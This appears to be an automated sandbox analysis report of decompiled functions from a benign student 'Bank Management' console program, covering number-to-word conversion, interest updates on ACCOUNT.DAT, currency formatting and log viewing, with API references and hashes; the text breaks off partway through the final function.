Uniqueness Score: -1.00%

Function 00232070, Relevance: 25.6, APIs: 9, Strings: 8, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00232070(void* __ecx, signed int _a4, char* _a8) {
				signed int _v8;

				_v8 = _a4;
				_v8 = _v8 - 2;
				if(_v8 > 7) {
					return strcpy(_a8, 0x23b224);
				}
				switch( *((intOrPtr*)(_v8 * 4 +  &M0023214C))) {
					case 0:
						return strcpy(_a8, "Twenty ");
					case 1:
						__ecx = _a8;
						return strcpy(_a8, "Thirty ");
					case 2:
						return strcpy(_a8, "Forty ");
					case 3:
						__eax = _a8;
						return strcpy(_a8, "Fifty ");
					case 4:
						__ecx = _a8;
						return strcpy(_a8, "Sixty ");
					case 5:
						return strcpy(_a8, "Seventy ");
					case 6:
						__eax = _a8;
						return strcpy(_a8, "Eighty ");
					case 7:
						__ecx = _a8;
						return strcpy(_a8, "Ninety ");
				}
			}

0x00232077
0x00232080
0x00232087
0x00000000
0x00232143
0x00232090
0x00000000
0x00000000
0x00000000
0x002320b2
0x00000000
0x00000000
0x00000000
0x00000000
0x002320db
0x00000000
0x00000000
0x002320ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00232114
0x00000000
0x00000000
0x00232127
0x00000000
0x00000000

APIs

strcpy.MSVCRT(00231C26,Twenty ,?,?,00231C26,?), ref: 002320A0
strcpy.MSVCRT(?,Thirty ), ref: 002320B6
strcpy.MSVCRT(?,Forty ), ref: 002320CC
strcpy.MSVCRT(?,Fifty ), ref: 002320DF
strcpy.MSVCRT(?,Sixty ), ref: 002320F2
strcpy.MSVCRT(?,Seventy ), ref: 00232105
strcpy.MSVCRT(?,Eighty ), ref: 00232118
strcpy.MSVCRT(?,Ninety ), ref: 0023212B
strcpy.MSVCRT(00231C26,0023B224,?,?,00231C26,?), ref: 0023213E

Strings

Ninety , xrefs: 00232122
Forty , xrefs: 002320C3
Twenty , xrefs: 00232097
Sixty , xrefs: 002320E9
Seventy , xrefs: 002320FC
Thirty , xrefs: 002320AD
Eighty , xrefs: 0023210F
Fifty , xrefs: 002320D6

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: strcpy
String ID: Eighty $Fifty $Forty $Ninety $Seventy $Sixty $Thirty $Twenty
API String ID: 3177657795-170854734
Opcode ID: 24b64d696e3f7aded3b3afb5cb439e4091a81643eefeedcf47f7379c41256812
Instruction ID: cd0a6a78eafc7ff01f3de54390054b3a40a4acbafeeb5a4ceca56103633f4893
Opcode Fuzzy Hash: 24b64d696e3f7aded3b3afb5cb439e4091a81643eefeedcf47f7379c41256812
Instruction Fuzzy Hash: 3F1130F5F38204F7CA28DE90DDC295D33366B56700F148A25BA8D1B351E5729A38DB92

Uniqueness

Uniqueness Score: -1.00%

Function 002324F0, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E002324F0(void* __ecx) {
				intOrPtr _v8;
				void* _t31;
				void* _t32;
				void* _t33;

				E002310D0(0, 0, 0x50, 0x17);
				E00231000(0x1b, 4);
				printf("BANK MANAGEMENT //");
				_t32 = _t31 + 4;
				E00231000(0x19, 5);
				_v8 = 0;
				while(_v8 < 0x1b) {
					_push(0xc4);
					printf("%c");
					_t32 = _t32 + 8;
					_v8 = _v8 + 1;
				}
				E00231000(0x19, 8);
				printf("Designed and Programmed by:");
				_t33 = _t32 + 4;
				E00231000(0x19, 9);
				_v8 = 0;
				while(_v8 < 0x1b) {
					_push(0xc4);
					printf("%c");
					_t33 = _t33 + 8;
					_v8 = _v8 + 1;
				}
				E00231000(0x21, 0xb);
				printf("Ravi Agrawal");
				E00231000(0x21, 0xd);
				printf("Sagar Sharma");
				E00231000(0x21, 0xf);
				printf("Sawal Maskey");
				E00231000(0x18, 0x14);
				return printf("Press Any key to continue...");
			}

0x002324fc
0x00232505
0x0023250f
0x00232515
0x0023251c
0x00232521
0x00232533
0x00232539
0x00232543
0x00232549
0x00232530
0x00232530
0x00232552
0x0023255c
0x00232562
0x00232569
0x0023256e
0x00232580
0x00232586
0x00232590
0x00232596
0x0023257d
0x0023257d
0x0023259f
0x002325a9
0x002325b6
0x002325c0
0x002325cd
0x002325d7
0x002325e4
0x002325fa

APIs

Part of subcall function 002310D0: printf.MSVCRT ref: 002310ED
Part of subcall function 002310D0: printf.MSVCRT ref: 0023112C
Part of subcall function 002310D0: printf.MSVCRT ref: 0023114E
Part of subcall function 002310D0: printf.MSVCRT ref: 002311C3
Part of subcall function 002310D0: printf.MSVCRT ref: 002311E7

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 0023250F
printf.MSVCRT ref: 00232543
printf.MSVCRT ref: 0023255C
printf.MSVCRT ref: 00232590
printf.MSVCRT ref: 002325A9
printf.MSVCRT ref: 002325C0
printf.MSVCRT ref: 002325D7
printf.MSVCRT ref: 002325EE

Strings

BANK MANAGEMENT //, xrefs: 0023250A
Sagar Sharma, xrefs: 002325BB
Designed and Programmed by:, xrefs: 00232557
Ravi Agrawal, xrefs: 002325A4
Sawal Maskey, xrefs: 002325D2
Press Any key to continue..., xrefs: 002325E9

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$ConsoleCursorHandlePosition
String ID: BANK MANAGEMENT //$Designed and Programmed by:$Press Any key to continue...$Ravi Agrawal$Sagar Sharma$Sawal Maskey
API String ID: 748348440-2888666035
Opcode ID: 3caf44f97510a1c1efa81f0e2d9c72e38980ce73528fe7bd0997c1a73bc438c7
Instruction ID: 6db7f38e119e0665025f3a54f1d92b48ba697a8c5d38067d30c4dbfb6fd33733
Opcode Fuzzy Hash: 3caf44f97510a1c1efa81f0e2d9c72e38980ce73528fe7bd0997c1a73bc438c7
Instruction Fuzzy Hash: 6B2145F06A0304FBF618A7A4BE1BF5975306F11B4AF140010F7067D1D2D9F216B86997

Uniqueness

Uniqueness Score: -1.00%

Function 002341D0, Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 208
filestringCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E002341D0(long long __fp0) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				long long _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v62;
				char _v82;
				char _v132;
				char _v133;
				char _v145;
				char _v160;
				char _v190;
				char _v220;
				char _v228;
				struct _IO_FILE* _t73;
				struct _IO_FILE* _t74;
				struct _IO_FILE* _t79;
				int _t80;
				struct _IO_FILE* _t108;
				struct _IO_FILE* _t115;
				struct _IO_FILE* _t149;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				long long _t194;

				_t194 = __fp0;
				_t73 = fopen("ACCOUNT.DAT", "r");
				_t178 = _t177 + 8;
				 *0x23b288 = _t73;
				if( *0x23b288 != 0) {
					_t74 = fopen("TEMP.DAT", "w");
					_t179 = _t178 + 8;
					 *0x23b284 = _t74;
					_v48 = 0;
					while(1) {
						_t79 =  *0x23b288; // 0x0
						_t80 = fscanf(_t79, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v228,  &_v220,  &_v190,  &_v145,  &_v132,  &_v82,  &_v133,  &_v160,  &_v62,  &_v60,  &_v56,  &_v52);
						_t180 = _t179 + 0x38;
						if(_t80 == 0xffffffff) {
							break;
						}
						_v16 = ( *0x0023B2A6 - 0x30) * 0xa +  *0x0023B2A7 - 0x30;
						_v8 = ( *0x0023B2A0 - 0x30) * 0xa +  *0x00DE8E4D - 0x30;
						_v12 = ( *0x0023B2A3 - 0x30) * 0xa +  *((char*)(0xde8e4d)) - 0x30;
						_v24 = _v8 * 0x1e + _v16 * 0x16d + _v12;
						_v16 = ( *((char*)(_t176 + 0xffffffffffffff6a)) - 0x30) * 0xa +  *((char*)(_t176 + 0xffffffffffffff6b)) - 0x30;
						_v8 = ( *((char*)(_t176 + 0xffffffffffffff64)) - 0x30) * 0xa +  *((char*)(_t176 + 0xbadb11)) - 0x30;
						_v12 = ( *((char*)(_t176 + 0xffffffffffffff67)) - 0x30) * 0xa +  *((char*)(_t176 + 0xbadb11)) - 0x30;
						_v28 = _v8 * 0x1e + _v16 * 0x16d + _v12;
						if(_v62 == 0x53 || _v62 == 0x73) {
							asm("movss xmm0, [0x238118]");
							asm("movss [ebp-0x10], xmm0");
						} else {
							asm("movss xmm0, [0x238114]");
							asm("movss [ebp-0x10], xmm0");
						}
						asm("cvtss2sd xmm0, [ebp-0x38]");
						asm("cvtsi2sd xmm1, ecx");
						asm("movsd [esp], xmm1");
						asm("movss xmm1, [ebp-0x10]");
						asm("divss xmm1, [0x238130]");
						asm("addss xmm1, [0x23811c]");
						asm("cvtss2sd xmm1, xmm1");
						asm("movsd [esp], xmm1");
						asm("movsd [ebp-0x20], xmm0");
						L00237C82();
						_v44 = _t194;
						asm("movsd xmm0, [ebp-0x20]");
						asm("mulsd xmm0, [ebp-0x28]");
						asm("cvtsd2ss xmm0, xmm0");
						asm("movss [ebp-0x30], xmm0");
						asm("movss xmm0, [ebp-0x30]");
						asm("subss xmm0, [ebp-0x38]");
						asm("addss xmm0, [ebp-0x34]");
						asm("movss [ebp-0x34], xmm0");
						asm("movss xmm0, [ebp-0x38]");
						asm("addss xmm0, [ebp-0x34]");
						asm("movss [ebp-0x30], xmm0");
						strcpy( &_v160, 0x23b2a0);
						asm("cvtss2sd xmm0, [ebp-0x30]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x34]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x38]");
						asm("movsd [esp], xmm0");
						_push(_v62);
						_push( &_v160);
						_push(_v133);
						_push( &_v82);
						_push( &_v132);
						_push( &_v145);
						_push( &_v190);
						_push( &_v220);
						_push( &_v228);
						_t108 =  *0x23b284; // 0x0
						fprintf(_t108, "%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
						_t179 = _t180 + 0x18 - 0xfffffffffffffff8 + 0x44;
					}
					_t115 =  *0x23b288; // 0x0
					fclose(_t115);
					_t149 =  *0x23b284; // 0x0
					return fclose(_t149);
				}
				return _t73;
			}

0x002341d0
0x002341e3
0x002341e9
0x002341ec
0x002341f8
0x00234208
0x0023420e
0x00234211
0x00234216
0x0023421d
0x00234264
0x0023426a
0x00234270
0x00234276
0x00000000
0x00000000
0x002342a4
0x002342cf
0x002342fa
0x00234311
0x0023433e
0x0023436b
0x00234398
0x002343af
0x002343b9
0x002343c4
0x002343cc
0x002343d3
0x002343d3
0x002343db
0x002343db
0x002343e0
0x002343eb
0x002343f2
0x002343f7
0x002343fc
0x00234404
0x0023440c
0x00234413
0x00234418
0x0023441d
0x00234425
0x00234428
0x0023442d
0x00234432
0x00234436
0x0023443b
0x00234440
0x00234445
0x0023444a
0x0023444f
0x00234454
0x00234459
0x0023446a
0x00234472
0x0023447a
0x0023447f
0x00234487
0x0023448c
0x00234494
0x0023449d
0x002344a4
0x002344ac
0x002344b0
0x002344b4
0x002344bb
0x002344c2
0x002344c9
0x002344d0
0x002344d6
0x002344dc
0x002344e2
0x002344e2
0x002344ea
0x002344f1
0x002344fa
0x00000000
0x00234507
0x0023450d

APIs

fopen.MSVCRT ref: 002341E3
fopen.MSVCRT ref: 00234208
fscanf.MSVCRT ref: 0023426A
pow.MSVCRT ref: 0023441D
strcpy.MSVCRT(?,0023B2A0), ref: 0023446A
fprintf.MSVCRT ref: 002344DC
fclose.MSVCRT ref: 002344F1
fclose.MSVCRT ref: 00234501

Strings

p5u:u@su, xrefs: 002344DC
%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 002344D1
TEMP.DAT, xrefs: 00234203
ACCOUNT.DAT, xrefs: 002341DE
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 0023425F

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: fclosefopen$fprintffscanfstrcpy
String ID: %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$ACCOUNT.DAT$TEMP.DAT$p5u:u@su
API String ID: 1564360689-656042897
Opcode ID: b7db24d4190e68885c61c4f77d110ba80e41ef7dc1cc0c32f164d24ff8bb1194
Instruction ID: 5a0998efffd8e5a1c0956ddd313288336386781e6a493220c8b45bfa7f2f6be0
Opcode Fuzzy Hash: b7db24d4190e68885c61c4f77d110ba80e41ef7dc1cc0c32f164d24ff8bb1194
Instruction Fuzzy Hash: 4B91D271C105499FCB09CFA8E995AEEFB7AFF45300F04826AE106BA191EB745685CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00231730, Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00231730(signed int __eax, char* _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v76;
				signed char _t207;
				char* _t264;
				void* _t337;
				void* _t338;

				asm("cvttss2si eax, [ebp+0xc]");
				_v16 = __eax;
				asm("cdq");
				 *(_t337 + 0xffffffffffffffec) = _v16 % 0x3e8;
				asm("cdq");
				_v16 = _v16 / 0x3e8;
				_v12 = 4;
				while(_v12 >= 0) {
					asm("cdq");
					 *(_t337 + _v12 * 4 - 0x28) = _v16 % 0x64;
					asm("cdq");
					_v16 = _v16 / 0x64;
					_v12 = _v12 - 1;
				}
				_v12 = 0;
				while(_v12 < 6) {
					if( *(_t337 + _v12 * 4 - 0x28) == 0) {
						_v12 = _v12 + 1;
						continue;
					} else {
					}
					break;
				}
				_v20 = _v12;
				_v8 = 0;
				_v12 = _v20;
				while(_v12 < 6) {
					if(_v12 != 5) {
						if( *(_t337 + _v12 * 4 - 0x28) >= 0xa || _v12 != _v20) {
							asm("cdq");
							_a4[_v8] =  *(_t337 + _v12 * 4 - 0x28) / 0xa + 0x30;
							_v8 = _v8 + 1;
						}
						asm("cdq");
						_a4[_v8] =  *(_t337 + _v12 * 4 - 0x28) % 0xa + 0x30;
						_v8 = _v8 + 1;
						_a4[_v8] = 0x2c;
						_v8 = _v8 + 1;
					} else {
						if( *(_t337 + _v12 * 4 - 0x28) >= 0x64 || _v12 != _v20) {
							asm("cdq");
							_a4[_v8] =  *(_t337 + _v12 * 4 - 0x28) / 0x64 + 0x30;
							_v8 = _v8 + 1;
						}
						asm("cdq");
						if( *(_t337 + _v12 * 4 - 0x28) % 0x64 >= 0xa || _v12 != _v20) {
							asm("cdq");
							asm("cdq");
							_a4[_v8] =  *(_t337 + _v12 * 4 - 0x28) % 0x64 / 0xa + 0x30;
							_v8 = _v8 + 1;
						}
						asm("cdq");
						if( *(_t337 + _v12 * 4 - 0x28) % 0x64 < 0xa && _v12 == _v20) {
							_a4[_v8] = 0x30;
							_v8 = _v8 + 1;
						}
						asm("cdq");
						asm("cdq");
						_a4[_v8] =  *(_t337 + _v12 * 4 - 0x28) % 0x64 % 0xa + 0x30;
						_v8 = _v8 + 1;
					}
					_v12 = _v12 + 1;
				}
				_t264 =  &(_a4[_v8]);
				 *_t264 = 0x2e;
				_v8 = _v8 + 1;
				asm("cvttss2si eax, [ebp+0xc]");
				asm("cvtsi2ss xmm0, eax");
				asm("movss xmm1, [ebp+0xc]");
				asm("subss xmm1, xmm0");
				asm("mulss xmm1, [0x238130]");
				asm("cvttss2si ecx, xmm1");
				_v16 = _t264;
				asm("cdq");
				_a4[_v8] = _v16 / 0xa + 0x30;
				_v8 = _v8 + 1;
				asm("cdq");
				_t207 =  &(_a4[_v8]);
				 *_t207 = _v16 % 0xa + 0x30;
				_v8 = _v8 + 1;
				_a4[_v8] = 0;
				asm("movss xmm0, [ebp+0xc]");
				asm("ucomiss xmm0, [0x238110]");
				asm("lahf");
				if((_t207 & 0x00000044) == 0) {
					strcpy(_a4, "0.00");
					_t338 = _t338 + 8;
				}
				strcpy( &_v76, "Rs. ");
				strcat( &_v76, _a4);
				return strcpy(_a4,  &_v76);
			}

0x00231736
0x0023173b
0x00231741
0x00231751
0x00231758
0x00231760
0x00231763
0x00231775
0x0023177e
0x00231789
0x00231790
0x00231798
0x00231772
0x00231772
0x0023179d
0x002317af
0x002317bd
0x002317ac
0x00000000
0x00000000
0x002317bf
0x00000000
0x002317bd
0x002317c6
0x002317c9
0x002317d3
0x002317e1
0x002317ef
0x002318d8
0x002318e9
0x002318fa
0x00231902
0x00231902
0x0023190c
0x0023191d
0x00231925
0x0023192e
0x00231937
0x002317f5
0x002317fd
0x0023180e
0x0023181f
0x00231827
0x00231827
0x00231831
0x0023183c
0x0023184d
0x00231857
0x00231868
0x00231870
0x00231870
0x0023187a
0x00231885
0x00231895
0x0023189e
0x0023189e
0x002318a8
0x002318b2
0x002318c3
0x002318cb
0x002318cb
0x002317de
0x002317de
0x00231942
0x00231945
0x0023194e
0x00231951
0x00231956
0x0023195a
0x0023195f
0x00231963
0x0023196b
0x0023196f
0x00231975
0x00231986
0x0023198e
0x00231994
0x002319a2
0x002319a5
0x002319ad
0x002319b6
0x002319b9
0x002319be
0x002319c5
0x002319c9
0x002319d4
0x002319d9
0x002319d9
0x002319e5
0x002319f5
0x00231a10

Strings

d, xrefs: 002317F8
0.00, xrefs: 002319CB
Rs. , xrefs: 002319DC

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0.00$Rs. $d
API String ID: 0-3201609306
Opcode ID: 5d6b562fe741ad8958638b27d14048e56bebc83429c9a2da2dd3030485bc986d
Instruction ID: 0bdac43c7cfdb83227fced2b021a9168d597d8d568f85bb443df7557d91c004c
Opcode Fuzzy Hash: 5d6b562fe741ad8958638b27d14048e56bebc83429c9a2da2dd3030485bc986d
Instruction Fuzzy Hash: EEA13CB4E11208EFDB05CF98C581B9CBBB2FF89314F248599E505AB390C734AEA1DB55

Uniqueness

Uniqueness Score: -1.00%

Function 002310D0, Relevance: 10.6, APIs: 7, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E002310D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;

				E00231000(_a4, _a8);
				_push(0xc9);
				printf("%c");
				_t101 = _t100 + 8;
				_v8 = _a4 + 1;
				while(_v8 < _a12 - 1) {
					E00231000(_v8, _a8);
					_push(0xcd);
					printf("%c");
					_t101 = _t101 + 8;
					_v8 = _v8 + 1;
				}
				E00231000(_v8, _a8);
				_push(0xbb);
				printf("%c");
				_t102 = _t101 + 8;
				_v12 = _a8 + 1;
				while(_v12 < _a16) {
					E00231000(_a4, _v12);
					_v8 = _a4;
					while(_v8 < _a12) {
						if(_v8 == _a4 || _v8 == _a12 - 1) {
							E00231000(_v8, _v12);
							_push(0xba);
							printf("%c");
							_t102 = _t102 + 8;
						}
						_v8 = _v8 + 1;
					}
					_v12 = _v12 + 1;
				}
				E00231000(_a4, _v12);
				_push(0xc8);
				printf("%c");
				_t103 = _t102 + 8;
				_v8 = _a4 + 1;
				while(_v8 < _a12 - 1) {
					E00231000(_v8, _v12);
					_push(0xcd);
					printf("%c");
					_t103 = _t103 + 8;
					_v8 = _v8 + 1;
				}
				E00231000(_v8, _v12);
				_push(0xbc);
				return printf("%c");
			}

0x002310de
0x002310e3
0x002310ed
0x002310f3
0x002310fc
0x0023110a
0x0023111d
0x00231122
0x0023112c
0x00231132
0x00231107
0x00231107
0x0023113f
0x00231144
0x0023114e
0x00231154
0x0023115d
0x0023116b
0x0023117b
0x00231183
0x00231191
0x0023119f
0x002311b4
0x002311b9
0x002311c3
0x002311c9
0x002311c9
0x0023118e
0x0023118e
0x00231168
0x00231168
0x002311d8
0x002311dd
0x002311e7
0x002311ed
0x002311f6
0x00231204
0x00231217
0x0023121c
0x00231226
0x0023122c
0x00231201
0x00231201
0x00231239
0x0023123e
0x00231254

APIs

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 002310ED
printf.MSVCRT ref: 0023112C
printf.MSVCRT ref: 0023114E
printf.MSVCRT ref: 002311C3
printf.MSVCRT ref: 002311E7
printf.MSVCRT ref: 00231226
printf.MSVCRT ref: 00231248

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$ConsoleCursorHandlePosition
String ID:
API String ID: 748348440-0
Opcode ID: bd5bd04ae2e657c2a9244c30e9cf2d03efd6d5b734d3c6732ef2167e06e86d95
Instruction ID: df4a9b2b571e2833018d516639db8bc000a0bfb77bf4d0932aee676e92712ef6
Opcode Fuzzy Hash: bd5bd04ae2e657c2a9244c30e9cf2d03efd6d5b734d3c6732ef2167e06e86d95
Instruction Fuzzy Hash: FA418FB5A20208FFCB08DFA8DD85EDE7B71BF44345F208158FA49AB244C671AA70DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00233ADF, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
stringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00233ADF() {
				struct _IO_FILE* _t233;
				int _t243;
				struct _IO_FILE* _t244;
				void* _t264;
				int _t285;
				void* _t298;
				void* _t302;
				struct _IO_FILE* _t327;
				int _t329;
				int _t334;
				struct _IO_FILE* _t343;
				void* _t359;
				struct _IO_FILE* _t382;
				void* _t399;
				struct _IO_FILE* _t427;
				void* _t474;
				void* _t476;
				void* _t477;
				void* _t478;
				void* _t483;
				void* _t484;
				void* _t487;
				void* _t489;
				void* _t495;
				void* _t496;
				long long _t502;

				L0:
				while(1) {
					L0:
					 *(_t474 - 8) = 1 +  *(_t474 - 8);
					 *(_t474 - 0xc) = 1 +  *(_t474 - 0xc);
					while(1) {
						L69:
						if( *(_t474 - 8) <  *(_t474 - 0x18)) {
						}
						L70:
						E00231000(5,  *(_t474 - 0xc) + 0xa);
						_push(1 +  *(_t474 - 8));
						printf("%d.");
						 *((char*)( *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x10)) + 0x36)) = 0;
						 *((char*)( *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x10)) + 0x40)) = 0;
						_t196 = 0x22 +  *(_t474 - 8) * 0x45; // 0x23
						_t285 = strlen( *((intOrPtr*)(_t474 - 0x10)) + _t196);
						_t489 = _t476 + 0xc;
						if(_t285 < 0xa) {
							_t359 =  *(_t474 - 8) * 0x45;
							_t200 = _t359 + 0x22; // 0x23
							E00231410(_t502,  *((intOrPtr*)(_t474 - 0x10)) + _t200);
						}
						L72:
						E00231000(9,  *(_t474 - 0xc) + 0xa);
						_t205 = 0x3b +  *(_t474 - 8) * 0x45; // 0x3c
						_push( *((intOrPtr*)(_t474 - 0x10)) + _t205);
						_t209 = 0x31 +  *(_t474 - 8) * 0x45; // 0x32
						_push( *((intOrPtr*)(_t474 - 0x10)) + _t209);
						_t213 = 0x22 +  *(_t474 - 8) * 0x45; // 0x23
						_push( *((intOrPtr*)(_t474 - 0x10)) + _t213);
						_t217 = 4 +  *(_t474 - 8) * 0x45; // 0x5
						_push( *((intOrPtr*)(_t474 - 0x10)) + _t217);
						printf("%s\t\t%s\t%s\t\t%s");
						_t476 = _t489 + 0x14;
						if( *(_t474 - 8) <  *(_t474 - 0x1c) + 9) {
							L74:
							goto L0;
						} else {
							L73:
							 *(_t474 - 0x1c) =  *(_t474 - 0x1c) + 0xa;
						}
						L75:
						_t345 =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0x53) {
							L77:
							 *(_t474 - 0x34) = 1;
						} else {
							L76:
							if( *((char*)(_t474 - 1)) == 0x73) {
								goto L77;
							}
						}
						L78:
						if( *((char*)(_t474 - 1)) == 0x20) {
							_t345 =  *(_t474 - 8);
							if( *(_t474 - 8) ==  *(_t474 - 0x18)) {
								 *(_t474 - 0x1c) = 0;
							}
						}
						L81:
						if( *((char*)(_t474 - 1)) == 0x53) {
							L50:
							E002323F0(_t345, _t502);
							if( *(_t474 - 0x18) >= 0xc) {
								E00231000(0xf, 0x15);
								printf("Press SPACE BAR to view more data");
								_t487 = _t476 + 4;
							} else {
								E00231000(8, 0x15);
								printf("Press S to toggle Sorting between ascending or descending order.");
								_t487 = _t476 + 4;
							}
							L53:
							E00231000(5, 8);
							printf("SN\t User Name\tDate\t\tStart time\tEnd Time");
							_t476 = _t487 + 4;
							E00231000(4, 9);
							 *(_t474 - 8) = 0;
							while(1) {
								L55:
								if( *(_t474 - 8) >= 0x46) {
									break;
								}
								L56:
								_push(0xc4);
								printf("%c");
								_t476 = _t476 + 8;
								L54:
								_t302 = 1 +  *(_t474 - 8);
								 *(_t474 - 8) = _t302;
							}
							L57:
							if( *(_t474 - 0x34) != 0) {
								L58:
								 *(_t474 - 8) =  *(_t474 - 0x18) - 1;
								while(1) {
									L60:
									if( *(_t474 - 8) < 0) {
										break;
									}
									L61:
									memcpy(( *(_t474 - 0x18) -  *(_t474 - 8) - 1) * 0x45 +  *((intOrPtr*)(_t474 - 0x24)),  *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x10)), 0x11 << 2);
									_t476 = _t476 + 0xc;
									asm("movsb");
									L59:
									_t399 =  *(_t474 - 8) - 1;
									 *(_t474 - 8) = _t399;
								}
								L62:
								 *(_t474 - 8) = 0;
								while(1) {
									L64:
									if( *(_t474 - 8) >=  *(_t474 - 0x18)) {
										goto L66;
									}
									L65:
									memcpy( *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x10)),  *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x24)), 0x11 << 2);
									_t476 = _t476 + 0xc;
									asm("movsb");
									L63:
									_t298 = 1 +  *(_t474 - 8);
									 *(_t474 - 8) = _t298;
								}
							}
							L66:
							if( *(_t474 - 0x1c) >  *(_t474 - 0x18)) {
								 *(_t474 - 0x1c) = 0;
							}
							L68:
							 *(_t474 - 8) =  *(_t474 - 0x1c);
							 *(_t474 - 0xc) = 0;
							L69:
							if( *(_t474 - 8) <  *(_t474 - 0x18)) {
							}
							goto L75;
						}
						L82:
						_t264 =  *((char*)(_t474 - 1));
						if(_t264 == 0x73) {
							goto L50;
						}
						L83:
						_t345 =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0x20) {
							goto L50;
						}
						L84:
						while(1) {
							L86:
							if(1 == 0) {
								break;
							}
							L1:
							 *(_t474 - 8) = 0;
							 *(_t474 - 0x28) = 0;
							 *(_t474 - 0x1c) = 0;
							 *(_t474 - 0x34) = 0;
							_t233 = fopen("LOG.DAT", "r");
							_t477 = _t476 + 8;
							 *0x23b280 = _t233;
							while(1) {
								L2:
								_t12 = 0x3b +  *(_t474 - 8) * 0x45; // 0x89
								_t16 = 0x31 +  *(_t474 - 8) * 0x45; // 0x7f
								_t20 = 0x22 +  *(_t474 - 8) * 0x45; // 0x70
								_t343 =  *0x23b280; // 0x0
								_t243 = fscanf(_t343, "%s %s %s %s\n",  *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x14)),  *((intOrPtr*)(_t474 - 0x14)) + _t20,  *((intOrPtr*)(_t474 - 0x14)) + _t16,  *((intOrPtr*)(_t474 - 0x14)) + _t12);
								_t478 = _t477 + 0x18;
								if(_t243 == 0xffffffff) {
									break;
								}
								L3:
								_t327 = fopen("USER.DAT", "r");
								_t495 = _t478 + 8;
								 *0x23b288 = _t327;
								while(1) {
									L4:
